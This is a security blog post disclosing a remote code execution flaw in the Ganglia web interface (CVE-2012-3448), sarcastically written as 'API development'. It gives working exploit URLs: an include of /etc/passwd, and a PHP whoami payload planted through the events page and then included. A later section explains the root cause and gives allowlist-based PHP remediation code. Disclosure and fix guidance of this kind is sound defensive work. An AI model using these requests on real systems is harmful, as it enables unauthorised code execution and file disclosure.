Friday, August 21, 2020

Extending Your Ganglia Install With The Remote Code Execution API

Previously I went over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). That article can be found here:
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to see whether this issue had been fixed, and I was pleasantly surprised... the GitHub repository is over here:
https://github.com/ganglia/ganglia-web
Looking at the code, the following (abbreviated) sequence can be found in graph.php:

$graph = isset($_GET["g"]) ? sanitize($_GET["g"]) : "metric";   // request-controlled
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);   // everything after the first comma, verbatim
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');   // request text is evaluated as PHP


I can only guess that the previous snippet was meant to be some sort of API for remote developers; unfortunately it is slightly broken. For some reason, when this API was being developed, part of its interface was wrapped in the following function:

function sanitize($string) {
  return escapeshellcmd(clean_string(rawurldecode($string)));
}


According to the PHP documentation for escapeshellcmd():
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec or system, or use backticks, to create our Ganglia extension. Our only option is to use PHP language constructs that do not require "(" or ")"; a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) suggests that "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful: we get a nice report with a list of current system users. Reporting like this is a nice feature, but what we really want is a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it turns out we can leverage some of its other functionality to finalize our Ganglia extension. The "events" page allows a Ganglia user to configure events in the system; I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screenshot, I have marked the "Event Summary" field with "php here". When creating our API extension event we fill in this field with the command we wish to run; see the following example request:
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request sets up an "event" that will let everyone know who you are, which is the friendly thing to do when attending an event. We can now wire up our API call to attend the newly created event. Since Ganglia keeps track of all planned events in "/var/lib/ganglia/conf/events.json", let's include this file in our API call:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'


As you can see, we have successfully made our API call and let everyone at the "event" know that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article gets you started on your Ganglia API development and that you are able to implement whatever functionality your environment requires. Thanks for following along.
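The root cause in both halves of the chain above is the same: escapeshellcmd() is a control for shell command strings, so applying it to text that ends up in eval() leaves untouched everything needed to write a parenthesis-free PHP statement, and the resulting include primitive turns any file an attacker can write to (here events.json) into code. The fix is to stop interpreting request text at all: look the report name up in an allowlist and validate each argument against a pattern, so no request text reaches eval() or include. The following is an added example written for this page, not Ganglia's own code or the project's actual fix; $GRAPH_ALLOWLIST, $ARG_RULES, parse_graph_request(), valid_event_summary() and the stand-in report functions are assumptions.

```php
<?php
// Added example, not code from Ganglia: a replacement for the eval()-based
// dispatch quoted above, plus input validation for the events summary.
// Function and argument names below are assumptions for illustration.

// Report functions reachable through the "g" parameter. Only keys listed here
// are callable; the request text is never handed to eval() or include.
$GRAPH_ALLOWLIST = [
    'cpu_report'  => 'graph_cpu_report',
    'load_report' => 'graph_load_report',
];

// Arguments a report may take, each with the pattern its value must match.
$ARG_RULES = [
    'metric' => '/^[A-Za-z0-9_.-]{1,64}$/',
    'range'  => '/^(hour|day|week|month|year)$/',
];

/**
 * Parse "name,key=value,..." into [callable, validated args].
 * Anything that is not an allowlisted name or a well-formed, allowlisted
 * key=value pair is rejected with an exception instead of being interpreted.
 */
function parse_graph_request(string $g, array $graphs, array $rules): array {
    $parts = explode(',', $g);
    $name  = array_shift($parts);
    if (!isset($graphs[$name])) {
        throw new InvalidArgumentException("unknown graph '$name'");
    }
    $args = [];
    foreach ($parts as $part) {
        if (strpos($part, '=') === false) {
            throw new InvalidArgumentException("malformed argument '$part'");
        }
        [$key, $value] = explode('=', $part, 2);
        if (!isset($rules[$key]) || !preg_match($rules[$key], $value)) {
            throw new InvalidArgumentException("rejected argument '$key'");
        }
        $args[$key] = $value;
    }
    return [$graphs[$name], $args];
}

/**
 * Event summaries are stored in events.json and rendered later, so keep
 * them to plain text: no angle brackets, no backticks, bounded length.
 * Defence in depth only; with eval() and the arbitrary include gone, the
 * file's contents can no longer be executed even if they contain PHP tags.
 */
function valid_event_summary(string $summary): bool {
    return preg_match('/^[A-Za-z0-9 .,:_-]{1,200}$/', $summary) === 1;
}

// Stand-ins for the real report functions; they only ever see validated scalars.
function graph_cpu_report(array $rrdtool_graph, array $args): array {
    $rrdtool_graph['title'] = 'CPU usage, last ' . ($args['range'] ?? 'hour');
    return $rrdtool_graph;
}
function graph_load_report(array $rrdtool_graph, array $args): array {
    $rrdtool_graph['title'] = 'Load, last ' . ($args['range'] ?? 'hour');
    return $rrdtool_graph;
}

// Constructed sample inputs: one benign request and the two "g" values from
// the article, as PHP sees them after $_GET has been URL-decoded once.
$samples = [
    'cpu_report,range=day',
    "cpu_report,include '/etc/passwd'",
    "cpu_report,include '/var/lib/ganglia/conf/events.json'",
];
foreach ($samples as $g) {
    try {
        [$fn, $args] = parse_graph_request($g, $GRAPH_ALLOWLIST, $ARG_RULES);
        $graph = call_user_func($fn, ['title' => ''], $args);
        echo "accepted: $g -> {$graph['title']}\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: $g (" . $e->getMessage() . ")\n";
    }
}
var_dump(valid_event_summary('Maintenance window'));
var_dump(valid_event_summary('<?php echo `whoami`; ?>'));
```

Two design points. First, the dispatcher never builds a string of code: the report name selects a callable from a fixed map and every argument is a scalar that matched its own regular expression, so the first sample is accepted and both payloads from the article are rejected at the "no '=' in argument" check before anything is looked up. Second, the original sanitize() ran rawurldecode() on a value PHP had already decoded; decoding twice only widens what can reach the sink, so the replacement works on $_GET as delivered and decodes nothing itself.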

Update: This issue has been assigned CVE-2012-3448.
